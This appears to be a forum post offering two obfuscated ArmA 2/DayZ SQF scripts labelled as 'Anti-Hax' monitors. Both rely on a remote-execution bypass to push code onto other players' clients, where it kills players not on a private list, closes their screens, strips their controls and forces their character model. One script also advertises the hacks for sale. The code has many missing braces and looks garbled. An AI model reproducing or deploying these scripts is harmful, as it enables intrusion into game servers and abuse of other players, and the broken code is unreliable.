Here's the script.
This is the one that shows
_list = call compile preprocessFileLineNumbers "scr\list.sqf";
_qkfpqokq = "if (isServer) then
""monky"" addPublicVariableEventHandler
_array = _this select 1;
_name = toString (_array select 0);
_reason = _array select 1;
_cght = format [""['CrinklyMilk's Anti-Hax', 'Caught: %1', 'For: %2'] spawn BIS_fnc_infoText;"", _name, _reason];
call compile (""[nil, nil, 'per', rSP""+""AWN, [], comp""+""ile _cght] ca""+""ll RE;"");
_qqqfghww = "if (isServer) then
[] spawn
call compile (""[nil, nil, """"per"""", rSP""+""AWN, [], {qgqgqwgww = true; while {qgqgqwgww} do
terminate dayz_slowcheck;
hintSilent parseText format [""""
<t size='2.3' color='#00FFFF'>CrinklyMilk's </t>
<t size='2.3' color='#00FFFF'>Anti-Hax</t><br/>
<t size='1.15' color='#00FF00'>Zombies Killed: </t><t size='1.15' color='#FFFFFF'>%1</t><br/>
<t size='1.15' color='#00FF00'>Headshots: </t><t size='1.15' color='#FFFFFF'>%2</t><br/>
<t size='1.15' color='#00FF00'>Murders: </t><t size='1.15' color='#FFFFFF'>%3</t><br/>
<t size='1.15' color='#00FF00'>Bandits Killed: </t><t size='1.15' color='#FFFFFF'>%4</t><br/>
<t size='1.15' color='#00FF00'>Blood: </t><t size='1.15' color='#FFFFFF'>%5</t><br/>
<t size='1.15' color='#00FF00'>Zombie Count: </t><t size='1.15' color='#FFFFFF'>%6</t><br/>
<t size='1.15' color='#00FF00'>Humanity: </t><t size='1.15' color='#FFFFFF'>%7</t><br/>
<t size='1.15' color='#00FF00'>Name: </t><t size='1.15' color='#FFFFFF'>%8</t><br/><br/>
<t size='1.25' color='#00FF00'>FPS: </t><t size='1.25' color='#FFFFFF'>%9</t>"""",
<t size='2.3' color='#00FFFF'>Want to buy these hacks?</t>
<t size='2.3' color='#00FFFF'>Contact me on skype.</t>
(player getVariable['zombieKills', 0]),
(player getVariable['headShots', 0]),
(player getVariable['humanKills', 0]),
(player getVariable['banditKills', 0]),
(player getVariable['USEC_BloodQty', r_player_blood]),
({alive player} count ((getPos player) nearEntities [['zZombie_Base'], 400])),
(player getVariable['humanity', 0]),
(name player),
(round diag_FPS)];
sleep 3;
};}] call RE;"");
_qgklqogiqj = format ["if (isServer) then
[] spawn
call compile ('[nil, nil, ""per"", rSP'+'AWN, [], {if !(getPlayerUID player in %1) then
qopgjqpoqjg = true;
while {qopgjqpoqjg} do
waitUntil {alive player};
sleep 30;
if !(isNil _x) exitWith
monky = [toArray (name player), ""Global Variable""];
publicVariableServer ""monky"";
sleep 10;
if (alive player) then { player SetDamage 1;};
for ""_i"" from 0 to 100 do {(findDisplay _i) closeDisplay 0;};
} forEach [""pic"",""veh"",""god"",""wuat_fpsMonitor"",""unitList"",""list_wrecked"",
};}] call RE;');
};", _list];
_opqgjkqpo = format ["if (isServer) then
[] spawn
call compile ('[nil, nil, ""per"", rSP'+'AWN, [], {if !(getPlayerUID player in %1) then
wghowkopw = true;
while {wghowkopw} do
_curpoz = (getPos player);
_lastpoz = player getVariable [""qjfqoiq"", _curpoz];
_curtimez = time;
_lasttimez = player getVariable [""qjqoqo"", _curtimez];
_distance = _lastPoz distance _curpoz;
_difftime = _curtimez - _lasttimez;
if (_difftime == 0) then {_difftime = 0.001;};
_speed = _distance / _difftime;
_maxspeed = 200;
_mount = vehicle player;
if ((_mount == player) && (_speed > _maxspeed) && ((_curpoz select 0) > 2) && ((_lastpoz select 0) > 2)) then
vehicle player setPos _lastpoz;
monky = [toArray (name player), ""TP""];
publicVariableServer ""monky"";
} else {player setVariable [""qjfqoiq"", _curpoz]; player setVariable [""qjqoqo"", _curtimez];};
if ((_curpoz select 0) < 2 && (_lastpoz select 0) > 2) then {player setPos _lastpoz;};
sleep 0.5;
};}] call RE;');
};", _list];
_quiquqtqtd = format ["if (isServer) then
[] spawn
call compile ('[nil, nil, ""per"", rSP'+'AWN, [], {if !(getPlayerUID player in %1) then
qtuioqtyuqiqq = true;
while {qtuioqtyuqiqq} do
(finddisplay 46) displayRemoveAllEventHandlers ""KeyDown"";
for ""_i"" from 0 to 25 do {player removeAction _i};
if (isNull (findDisplay 106)) then {closeDialog 0;};
HMDIR = nil; HDIR = nil; ctrl_onKeyDown = nil;
sleep 0.25;
};}] call RE;');
};", _list];
_qtuiogqgtqqtq = format ["if (isServer) then
[] spawn
call compile ('[nil, nil, ""per"", rSP'+'AWN, [], {if !(getPlayerUID player in %1) then
qtuqtoiqyqgjj = true;
while {qtuqtoiqyqgjj} do
playableUnits = [player];
allUnits = [player];
allMissionObjects = [player];
entities = [player];
vehicles = [player];
{if !(getPlayerUID _x in %1) then {_x hideObject false;};} forEach ([6800, 9200, 0] nearEntities [[""CAManBase""], 11000]);
sleep 5;
};}] call RE;');
};", _list];
_twpojwgijwwqs = format ["if (isServer) then
[] spawn
call compile ('[nil, nil, ""per"", rSP'+'AWN, [], {if !(getPlayerUID player in %1) then
iwuywiywwhmwhw = true;
while {iwuywiywwhmwhw} do
_items = weapons player;
if (_x in _items) then
player removeWeapon _x;
monky = [toArray (name player), ""Hacked Item""];
publicVariableServer ""monky"";
} forEach [""BAF_AS50_TWS"",""ItemRadio"",""UZI_SD_EP1"",""M4A1_HWS_GL_SD_Camo"",
sleep 30;
};}] call RE;');
};", _list];
_wuwuuiwtywuihj = format ["if (isServer) then
[] spawn
call compile ('[nil, nil, ""per"", rSP'+'AWN, [], {if !(getPlayerUID player in %1) then
wiuwiuoywujhfff = true;
while {wiuwiuoywujhfff} do
waitUntil {(((typeOf player in [""Soldier1_DZ"", ""Rocket_DZ"", ""Survivor1_DZ""]) or (player isKindOf ""Animal"") or (player isKindOf ""zZombie_Base"")) && (player in ([6800, 9200, 0] nearEntities [[""Man""], 11000])))};
sleep 1;
[dayz_playerUID, dayz_characterID, ""Survivor2_DZ""] spawn player_humanityMorph;
};}] call RE;');
};", _list];
_ihueuihjshsbhs = format ["if (isServer) then
[] spawn
call compile ('[nil, nil, ""per"", rSP'+'AWN, [], {if !(getPlayerUID player in %1) then
ihugwgshsbhs = true;
while {ihugwgshsbhs} do
waitUntil {alive player};
sleep 30;
_curblood = r_player_blood;
r_player_blood = _curblood - 1;
sleep 1;
if ((r_player_blood == 12000) && (alive player)) exitWith
monky = [toArray (name player), ""God""];
publicVariableServer ""monky"";
sleep 10;
for ""_i"" from 0 to 100 do {(findDisplay _i) closeDisplay 0;};
} else {r_player_blood = _curblood;};
sleep 30;
};}] call RE;');
};", _list];
_wkghwuihwgwj = format ["if (isServer) then
[] spawn
call compile ('[nil, nil, ""per"", rSP'+'AWN, [], {if !(getPlayerUID player in %1) then
wgkjwiowhwuihqqq = (findDisplay 46) displayAddEventHandler [""KeyUp"", ""if ((_this select 1) == 0xD2 or (_this select 1) == 0xD3 or (_this select 1) == 0x3B) then
for """"_i"""" from 0 to 100 do {(findDisplay _i) closeDisplay 0;};
};}] call RE;');
};", _list];
if (isNil "qq") then
qq = 0;
if (qq == 0) then
qq = 1;
hint "Starting Monitor";
[_qkfpqokq] execVM "scr\exec.sqf";
sleep 1;
[_qqqfghww] execVM "scr\exec.sqf";
sleep 1;
[_qgklqogiqj] execVM "scr\exec.sqf";
sleep 1;
[_opqgjkqpo] execVM "scr\exec.sqf";
sleep 1;
[_quiquqtqtd] execVM "scr\exec.sqf";
sleep 1;
[_qtuiogqgtqqtq] execVM "scr\exec.sqf";
sleep 1;
[_twpojwgijwwqs] execVM "scr\exec.sqf";
sleep 1;
[_wuwuuiwtywuihj] execVM "scr\exec.sqf";
sleep 1;
[_ihueuihjshsbhs] execVM "scr\exec.sqf";
sleep 1;
[_wkghwuihwgwj] execVM "scr\exec.sqf";
qq = 0;
hint "Stopping Monitor";
_stop = format ["
if (isServer) then {BIS_MPF_ServerPersistentCallsArray = [[nil,nil,""per"",""execVM"",""ca\Modules\Functions\init.sqf""]];};
qkfpqokq = false;
qgqgqwgww = false;
qopgjqpoqjg = false;
wghowkopw = false;
qtuioqtyuqiqq = false;
qtuqtoiqyqgjj = false;
iwuywiywwhmwhw = false;
wiuwiuoywujhfff = false;
ihugwgshsbhs = false;
if !(getPlayerUID player in %1) then {(finddisplay 46) displayRemoveAllEventHandlers ""KeyUp"";};", _list];
[_stop] execVM "scr\exec.sqf";
This is the invisible one
_list = call compile preprocessFileLineNumbers "scr\list.sqf";
_qweqeiewq = "if (isServer) then
""wizard"" addPublicVariableEventHandler
_array = _this select 1;
_name = toString (_array select 0);
_reason = _array select 1;
_cght = format [""['Wizard Anti-Hax', 'Caught: %1', 'For: %2'] spawn BIS_fnc_infoText;"", _name, _reason];
call compile (""[nil, nil, 'per', rSP""+""AWN, [], comp""+""ile _cght] ca""+""ll RE;"");
_qqweoijeo = "if (isServer) then
[] spawn
call compile (""[nil, nil, """"per"""", rSP""+""AWN, [], {qgqgqwgzaw = true; while {qgqgqwgzaw} do
terminate dayz_slowcheck;
hintSilent parseText format [""""
<t size='2.3' color='#FFFF00'>WIZARD</t><br/>
<t size='2.3' color='#5882FA'>M0NIT0R</t><br/>
<t size='1.15' color='#FF0033'>Zombies Killed: </t><t size='1.15' color='#FFFF00'>%1</t><br/>
<t size='1.15' color='#FF0033'>Headshots: </t><t size='1.15' color='#FFFF00'>%2</t><br/>
<t size='1.15' color='#FF0033'>Murders: </t><t size='1.15' color='#FFFF00'>%3</t><br/>
<t size='1.15' color='#FF0033'>Bandits Killed: </t><t size='1.15' color='#FFFF00'>%4</t><br/>
<t size='1.15' color='#FF0033'>Blood: </t><t size='1.15' color='#FFFF00'>%5</t><br/>
<t size='1.15' color='#FF0033'>Zombie Count: </t><t size='1.15' color='#FFFF00'>%6</t><br/>
<t size='1.15' color='#FF0033'>Humanity: </t><t size='1.15' color='#FFFF00'>%7</t><br/>
<t size='1.15' color='#FF0033'>Name: </t><t size='1.15' color='#FFFF00'>%8</t><br/><br/>
<t size='1.25' color='#FF0033'>FPS: </t><t size='1.25' color='#FFFF00'>%9</t>"""",
(player getVariable['zombieKills', 0]),
(player getVariable['headShots', 0]),
(player getVariable['humanKills', 0]),
(player getVariable['banditKills', 0]),
(player getVariable['USEC_BloodQty', r_player_blood]),
({alive player} count ((getPos player) nearEntities [['zZombie_Base'], 400])),
(player getVariable['humanity', 0]),
(name player),
(round diag_FPS)];
sleep 3;
};}] call RE;"");
_qgewriwrw = format ["if (isServer) then
[] spawn
call compile ('[nil, nil, ""per"", rSP'+'AWN, [], {if !(getPlayerUID player in %1) then
qopgjqpgdw = true;
while {qopgjqpgdw} do
waitUntil {alive player};
sleep 30;
if !(isNil _x) exitWith
wizard = [toArray (name player), ""Global Variable""];
publicVariableServer ""wizard"";
sleep 10;
if (alive player) then { player SetDamage 1;};
for ""_i"" from 0 to 100 do {(findDisplay _i) closeDisplay 0;};
} forEach [""pic"",""veh"",""god"",""wuat_fpsMonitor"",""unitList"",""list_wrecked"",
};}] call RE;');
};", _list];
_opiriefwlke = format ["if (isServer) then
[] spawn
call compile ('[nil, nil, ""per"", rSP'+'AWN, [], {if !(getPlayerUID player in %1) then
wghowkawa = true;
while {wghowkawa} do
_curpoz = (getPos player);
_lastpoz = player getVariable [""qjfqoiq"", _curpoz];
_curtimez = time;
_lasttimez = player getVariable [""qjqoqo"", _curtimez];
_distance = _lastPoz distance _curpoz;
_difftime = _curtimez - _lasttimez;
if (_difftime == 0) then {_difftime = 0.001;};
_speed = _distance / _difftime;
_maxspeed = 200;
_mount = vehicle player;
if ((_mount == player) && (_speed > _maxspeed) && ((_curpoz select 0) > 2) && ((_lastpoz select 0) > 2)) then
vehicle player setPos _lastpoz;
wizard = [toArray (name player), ""Teleport""];
publicVariableServer ""wizard"";
} else {player setVariable [""qjfqoiq"", _curpoz]; player setVariable [""qjqoqo"", _curtimez];};
if ((_curpoz select 0) < 2 && (_lastpoz select 0) > 2) then {player setPos _lastpoz;};
sleep 0.5;
};}] call RE;');
};", _list];
_quiqwrwer = format ["if (isServer) then
[] spawn
call compile ('[nil, nil, ""per"", rSP'+'AWN, [], {if !(getPlayerUID player in %1) then
qtuioqtyuqzwa = true;
while {qtuioqtyuqzwa} do
(finddisplay 46) displayRemoveAllEventHandlers ""KeyDown"";
(finddisplay 46) displayRemoveAllEventHandlers ""KeyUp"";
for ""_i"" from 0 to 25 do {player removeAction _i};
if (isNull (findDisplay 106)) then {closeDialog 0;};
HMDIR = nil; HDIR = nil; ctrl_onKeyDown = nil;
sleep 0.25;
};}] call RE;');
};", _list];
_qtuwrewiugdf = format ["if (isServer) then
[] spawn
call compile ('[nil, nil, ""per"", rSP'+'AWN, [], {if !(getPlayerUID player in %1) then
qtuqtoiqyhrs = true;
while {qtuqtoiqyhrs} do
playableUnits = [player];
allUnits = [player];
allMissionObjects = [player];
entities = [player];
vehicles = [player];
{if !(getPlayerUID _x in %1) then {_x hideObject false;};} forEach ([6800, 9200, 0] nearEntities [[""CAManBase""], 11000]);
sleep 5;
};}] call RE;');
};", _list];
_twpoknafawops = format ["if (isServer) then
[] spawn
call compile ('[nil, nil, ""per"", rSP'+'AWN, [], {if !(getPlayerUID player in %1) then
iwuywiywwhmwqz = true;
while {iwuywiywwhmwqz} do
_items = weapons player;
if (_x in _items) then
player removeWeapon _x;
wizard = [toArray (name player), ""Hacked Item""];
publicVariableServer ""wizard"";
} forEach [""BAF_AS50_TWS"",""ItemRadio"",""UZI_SD_EP1"",""M4A1_HWS_GL_SD_Camo"",
""G36_C_SD_camo"",""revolver_gold_EP1"",""MakarovSD"",""G36_C_SD_eotech"", ""M40A3"",
sleep 30;
};}] call RE;');
};", _list];
_wuwujkfwfewka = format ["if (isServer) then
[] spawn
call compile ('[nil, nil, ""per"", rSP'+'AWN, [], {if !(getPlayerUID player in %1) then
wiuwiuoywahtrf = true;
while {wiuwiuoywahtrf} do
waitUntil {(((typeOf player in [""Soldier1_DZ"", ""Rocket_DZ"", ""Survivor1_DZ""]) or (player isKindOf ""Animal"") or (player isKindOf ""zZombie_Base"")) && (player in ([6800, 9200, 0] nearEntities [[""CAManBase""], 11000])))};
[dayz_playerUID, dayz_characterID, ""Survivor2_DZ""] spawn player_humanityMorph;
sleep 1;
};}] call RE;');
};", _list];
_ihuepokajeasc = format ["if (isServer) then
[] spawn
call compile ('[nil, nil, ""per"", rSP'+'AWN, [], {if !(getPlayerUID player in %1) then
ihugwgserashs = true;
while {ihugwgserashs} do
waitUntil {alive player};
sleep 30;
_curblood = r_player_blood;
r_player_blood = _curblood - 1;
sleep 1;
if ((r_player_blood == 12000) && (alive player)) exitWith
wizard = [toArray (name player), ""God""];
publicVariableServer ""wizard"";
sleep 10;
for ""_i"" from 0 to 100 do {(findDisplay _i) closeDisplay 0;};
} else {r_player_blood = _curblood;};
sleep 30;
};}] call RE;');
};", _list];
_wkghjfjwefifjew = format ["if (isServer) then
[] spawn
call compile ('[nil, nil, ""per"", rSP'+'AWN, [], {if !(getPlayerUID player in %1) then
wgkjwiowhwuihqqq = (findDisplay 46) displayAddEventHandler [""KeyUp"", ""if ((_this select 1) == 0xD2 or (_this select 1) == 0xD3 or (_this select 1) == 0x3B) then
for """"_i"""" from 0 to 100 do {(findDisplay _i) closeDisplay 0;};
};}] call RE;');
};", _list];
if (isNil "qq") then
qq = 0;
if (qq == 0) then
qq = 1;
hint "Starting Monitor";
[_qweqeiewq] execVM "scr\exec.sqf";
sleep 1;
[_qqweoijeo] execVM "scr\exec.sqf";
sleep 1;
[_qgewriwrw] execVM "scr\exec.sqf";
sleep 1;
[_opiriefwlke] execVM "scr\exec.sqf";
sleep 1;
[_quiqwrwer] execVM "scr\exec.sqf";
sleep 1;
[_qtuwrewiugdf] execVM "scr\exec.sqf";
sleep 1;
[_twpoknafawops] execVM "scr\exec.sqf";
sleep 1;
[_wuwujkfwfewka] execVM "scr\exec.sqf";
sleep 1;
[_ihuepokajeasc] execVM "scr\exec.sqf";
sleep 1;
[_wkghjfjwefifjew] execVM "scr\exec.sqf";
hint "Monitor Started";
qq = 0;
hint "Stopping Monitor";
_stop = format ["
if (isServer) then {BIS_MPF_ServerPersistentCallsArray = [[nil,nil,""per"",""execVM"",""ca\Modules\Functions\init.sqf""]];};
qweqeiewq = false;
qgqgqwgzaw = false;
qopgjqpgdw = false;
wghowkawa = false;
qtuioqtyuqzwa = false;
qtuqtoiqyhrs = false;
iwuywiywwhmwqz = false;
wiuwiuoywahtrf = false;
ihugwgserashs = false;
if !(getPlayerUID player in %1) then {(finddisplay 46) displayRemoveAllEventHandlers ""KeyUp"";};", _list];
[_stop] execVM "scr\exec.sqf";
hint "Stopped Monitor";
Both need working Remote execution bypass scripts.
If you have any problems I can post another one or two and you can see if those work.